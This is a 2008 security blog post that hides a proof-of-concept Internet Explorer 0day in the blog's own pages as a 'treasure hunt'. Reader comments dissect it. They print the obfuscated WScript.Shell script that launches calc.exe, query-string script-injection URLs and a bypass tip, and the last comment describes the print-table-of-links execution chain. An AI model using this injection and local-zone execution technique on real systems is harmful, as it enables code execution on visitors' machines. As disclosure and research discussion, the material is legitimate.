If at first you don't succeed; call it version 1.0
Wednesday, 07 May 2008

[And the winner is: George the Greek]
Today we are celebrating, here in Israel, 60 years of being an independent country. As part of the celebration, I’m releasing a new 0day vulnerability.
One of our customs in Independence day is to play a “treasure hunt” game. In this game there is a treasure hidden somewhere in our beautiful country, and we get mysterious clues that help us find this treasure by traveling to many great sites all over Israel.
In the spirit of this day, I’ve decided not to release full details about this vulnerability yet, but rather play a little “treasure hunt” game.
Somewhere in my blog, I embedded a proof-of-concept code which exploits this 0day vulnerability. The following are some clues that will help you find this 0day treasure:
  1) IE7.0 and IE8.0b users will get pwned.
  2) An interaction with the sploit is needed.
  3) There’s no need to find the post. It’s everywhere.
  4) 404 is the way to go.
  5) Acidus was right! Local resources is the key. 
  6) What else can you do with an anchor? Think out of the box, literally.
  7) Charles Babbage is probably turning in his grave. 
  8) The following screenshot should really help you find the source of the treasure:
    
9) Put the videos together to find the treasure.
        

Every day or two I will add a new clue to this list, in a hope that by next Wednesday someone will eventually find the treasure :-)
Next Wednesday I will release the full technical details of this 0day vulnerability and the proof-of-concept code.
Until then, feel free to comment your findings. The first person who will post a comment with the proof-of-concept code and details on how to use it to exploit the vulnerability will be declared as the winner.
Now, I don’t have any laptop prize to give the winner. But, beside the credit for being the first to find a 0day treasure, I’m willing to offer the winner a free entrance to the IsraCON security conference that will take place in Israel this summer.

Happy hunting!

[UPDATE 08-May-2008] Some of you guys out there are already in the right direction, some are not. I've added 2 more clues.
[UPDATE 10-May-2008] You are getting closer. Pay attention to clue number 6.
[UPDATE 11-May-2008] Yet another clue added.
[UPDATE 12-May-2008] I've added a new screenshot clue. 
[UPDATE 13-May-2008] Last clue added (3 videos). The game will end tomorrow evening (Israel time). You still have enough time to find the treasure.
[UPDATE 14-May-2008 02:30] And we have a winner! details soon...
[UPDATE 14-May-2008 16:15] The winner is: George the Greek. Congratulations! Full technical details of the vulnerability are available here.


Wednesday, 07 May 2008 17:07:30 UTC | Comments [26] | General | Security#
Wednesday, 07 May 2008 21:04:19 UTC
Does the exploit have something to do with this comment form?
Wednesday, 07 May 2008 21:20:14 UTC
Nope.
Thursday, 08 May 2008 12:42:53 UTC
I know that you're a big fan of XSS...is it a reflected XSS in the ASP framework?
It's not fair -i know- so let's search it during the next coffee break :)





Thursday, 08 May 2008 14:03:37 UTC
It's not hidden in the sites source somehwere is it?
no.skill
Thursday, 08 May 2008 15:19:20 UTC
In track.aspx, you're plucking characters for your exploit out of the XMLHTTP response for the trex.aspx 404 page. But your exploit code doesn't run, even if I change it to be appended to EVERY hyperlink on your page instead of just one random link. When I click the links, I just go to the page and your CT.aspx page strips off the exploit code. WScript.Shell never even tries to run, since it's not marked safe for scripting.

Where's the beef?
Thursday, 08 May 2008 15:35:36 UTC
I use Spybot: Search & Destroy. It has a feature that informs me if certain registry entries are added or changed.

When I opened this page in Internet Explorer, Spybot popped up telling me that a registry entry is being changed, as follows:
Category: User-specific browser toolbar
Change: Value added
Entry: ITBar7Layout
Old data: (there is none)
New data: hex:13,00,00,00,00,00,00,00,00,00,00,00,30, (the pop-up cannot show more)

It looks like the exploit has something to do with this... does it create a new tool bar, or manipulate an existing toolbar? What precisely is "ITBar7Layout"?

Addendum: It looks as if this has something to do with IE7's toolbar. Maybe if you allow the registry change and then show the toolbar... I will try that now, and then see what happens. (Maybe all the 00 values result in a buffer overflow?)

Looking at the code, I see that there is a hidden form element withe the name of "__VIEWSTATE". It has a ridiculously long value associated with it. The form itself (having name "mainForm") is submitted when JavaScript function "__doPostBack" is activated. However, I am not certain what will trigger that function.

Am I getting close here?
Thursday, 08 May 2008 16:26:16 UTC
I love Palestina...

Peace for Palestina and Israel people.
Thursday, 08 May 2008 18:11:48 UTC
Não vi nenhum e não percebi nenhum exploit sendo executado e não apareceu nenhum erro
Thursday, 08 May 2008 21:40:59 UTC
Happy 60th Anniversary to Israel!

Aviv- great job on this initiative, kol hakavod!
Friday, 09 May 2008 12:38:55 UTC
Dude, I wouldn't be afraid of your 0-day exploit. I mean, what about all those tables?!?

/funny
Friday, 09 May 2008 13:05:30 UTC
It doesnt have anything to do with the file called Microsummary.ashx? Just a guess
Friday, 09 May 2008 15:23:14 UTC
well the code that is being run is:

var x=new
ActiveXObject('W'+'S'+'c'+'r'+'i'+'p'+'t'+'.'+'S'+'h'+'e'+'l'+'l');x.Run('c'+'a'+'l'+'c'+'.'+'e'+'x'+'e');

which like Frank said above is auto generated from a 404 page and randomly appended to a url. but it never runs?! is that it?!
Friday, 09 May 2008 16:30:16 UTC
Well, you do manage to modify (with track.aspx using XmlHttpRequest to get trex.aspx 404 page and building a URL "add-on" from its chars) a pseudo-random link on your page like this:

http://aviv.raffon.net/CategoryView,category,Security.aspx/?&trackid=68ede44f70bb4790ab79a58c072a470a6007e76202d44d1ba4f8bc9c0802f2c4616937f1bfb94cb4bdfd5a08c3939a3&trex=<script defer>var x=new ActiveXObject('W'+'S'+'c'+'r'+'i'+'p'+'t'+'.'+'S'+'h'+'e'+'l'+'l');x.Run('c'+'a'+'l'+'c'+'.'+'e'+'x'+'e');</script>

But it does nothing for me when I click on such a link in IE7. calc.exe is not started.
Friday, 09 May 2008 19:06:34 UTC
Is Vista's IE7 protected mode vulnerable? Is the flaw is exploitable only on XP?
Friday, 09 May 2008 22:00:23 UTC
i found that u should just request trex page, because it modifies trex, so the link should look like this:
http://aviv.raffon.net/trex?&trackid=867b06ed037446d58203a180f2f58a41c715bb36d06c462d85dfe9f8ba640f82deb167ca407246189f401dd8c61d4bef&trex=<script%20defer>var%20x=new%20ActiveXObject('W'+'S'+'c'+'r'+'i'+'p'+'t'+'.'+'S'+'h'+'e'+'l'+'l');x.Run('c'+'a'+'l'+'c'+'.'+'e'+'x'+'e');</script>

but, in IE7 running on vista the code is blocked and the information is displayed:
"A potentially dangerous Request.QueryString value was detected from the client (trex="<script defer>var x=...")."

any other idea?
Friday, 09 May 2008 23:07:22 UTC
Put the code:

<html><script>var x=new
ActiveXObject('W'+'S'+'c'+'r'+'i'+'p'+'t'+'.'+'S'+'h'+'e'+'l'+'l');x.Run('c'+'a'+'l'+'c'+'.'+'e'+'x'+'e');</script></html>


into a blank file (e.g. C:\aviv.html), and open it. After allowing the ActiveX to run, calc.exe will run.

Now, if you'd set validateRequest=false in your server config (if you can), it will let the URL

http://aviv.raffon.net/trex?&trackid=867b06ed037446d58203a180f2f58a41c715bb36d06c462d85dfe9f8ba640f82deb167ca407246189f401dd8c61d4bef&trex=<scri%70t%20defer>var%20x=new%20ActiveXObject('W'+'S'+'c'+'r'+'i'+'p'+'t'+'.'+'S'+'h'+'e'+'l'+'l');x.Run('c'+'a'+'l'+'c'+'.'+'e'+'x'+'e');</script>

through.

Scott
Saturday, 10 May 2008 02:36:21 UTC
I think the whole link-appending thing is a red herring. That's what makes for a good treasure hunt, am I right? If you notice the chosen link has a ?trackid argument that is appended by the javascript, there's no reason for that to be put there if the exploit was as simple as appending wscript.shell...etc to a link.
Saturday, 10 May 2008 12:45:07 UTC
I think one or other of Window's components such as the gadget sidebar or the favourites toolbar within IE renders failed attempt to fetch a page which results in a 404 in such a way that the URL is embedded in the in the rendered response. I'd go with gadget sidebar here because it basically renders using the IE engine. From there on in, it's a straight forward case of XSS into the local zone, allowing WScript.Shell to be invoked. So that's the theorical, if I'm right all I need to do is find the place where the 404 is rendered as such.
Sunday, 11 May 2008 14:33:42 UTC
Specifically LINE 4, fails when run via a CLIENT accessing a LOCAL SERVER:

<script language=JavaScript>
function fn_DPW (a)
{
MyObject = new ActiveXObject("WScript.Shell");
}
</script>
The page cannot be displayed---404
HTA has no security restrictions when coded correctly: The following tab MUST be in the <head> tabs or above:

<HTA:APPLICATION ></HTA:APPLICATION>

enjoy and have fun - Encryp+!0n
Sunday, 11 May 2008 14:58:30 UTC
accessKey property?
Sunday, 11 May 2008 19:30:44 UTC
if this vulnerability is really some ub3rian 0day i'd rather sell it than just throw it away ..
anywayz.. thats just me
you whitey ass/hats have fun now :)
Exodus
Monday, 12 May 2008 13:02:40 UTC
insert this n url <script type="text/javascript">_uacct = "UA-603122-1";urchinTracker();</script>.

Cause 404 error metod framework from client
http://aviv.raffon.net/<script type="text/javascript">_uacct = "UA-603122-1";urchinTracker();</script>
Monday, 12 May 2008 17:18:45 UTC
Looking to the code you use, you're doing an XMLHttpRequest to /track/trex.aspx, which looks like it is the same post we're looking. Then, you use characters carefully selected from the GET http response to modify the links.
I check the http response here (http://www.websiteoptimization.com/services/analyze/index.html) from track.aspx and it works, but when sending an http request to trex.aspx, it displays a 404 response. The funny thing is that it happens when trying to display it in FF 3 as well (the first time), then I reload and it displays your blog's main page.
Also, when trying track.aspx in FF, it shows the whole code. In IE7 it says:

"Can't display the XML site... A semicolon (;) was expected. Error in processing of http://aviv.raffon.net/track/track.aspx. Line 9,... ancs[parseInt(Math.random(10)*ancs.length)].href+='/?&trackid=bde2504d97fc4d219123b0af1c20794cded945797b094715a3bcb28c1f..."

I guess that, including the right stuff in the call to track.aspx get parameters, it'll call applications in client PC.
Monday, 12 May 2008 17:37:42 UTC
what if using the known mailto:test%../../../../../windows/system32/calc.exe thing?
Tuesday, 13 May 2008 18:54:09 UTC
the 3 videos suggest these words? print, table, text ?
endOfEnd
Tuesday, 13 May 2008 22:45:29 UTC
Well I guess the deadline is approaching... I pretty sure somebody figured it out days ago and you are waiting until Wednesday to announce it, but in case they haven't... here it goes:

Exploit:

1) Visit http://aviv.raffon.net/2008/05/07/HappyBirthdayIsrael.aspx an innoncent looking webpage. Oh look, this page appends some text at the end of a random HTML-anchored link.

2) Oh well, let's go ahead and print a copy of this web page. File menu, "Print...". Hmm, maybe it would be nice to enable Internet Explorer's handy "Print table of links" under the "Options" tab of the print dialog window.

3) Wait a minute, I didn't ask the Windows calculator to be executed!

Description:

On the "innocent" webpage there is an HTML script tag that references "/track/track.aspx". This script pieces together the exploit code and randomly appends it to one of the links on the "innocent" page.

When the Internet Explorer print subsystem kicks in, the embedded javascript within the link is executed in the local context.

Pretty cool, but most likely will only affect librarians... I don't know anyone else who actually uses this feature. :-)

Greetz to jh and bc!
Comments are closed.     
Send me an Email
Follow me on Twitter
RSS Feeds
  
Blogroll
Archive
Admin Login
Sign In
Disclaimer
The opinions expressed herein are my own personal opinions and do not represent my employer's view in anyway.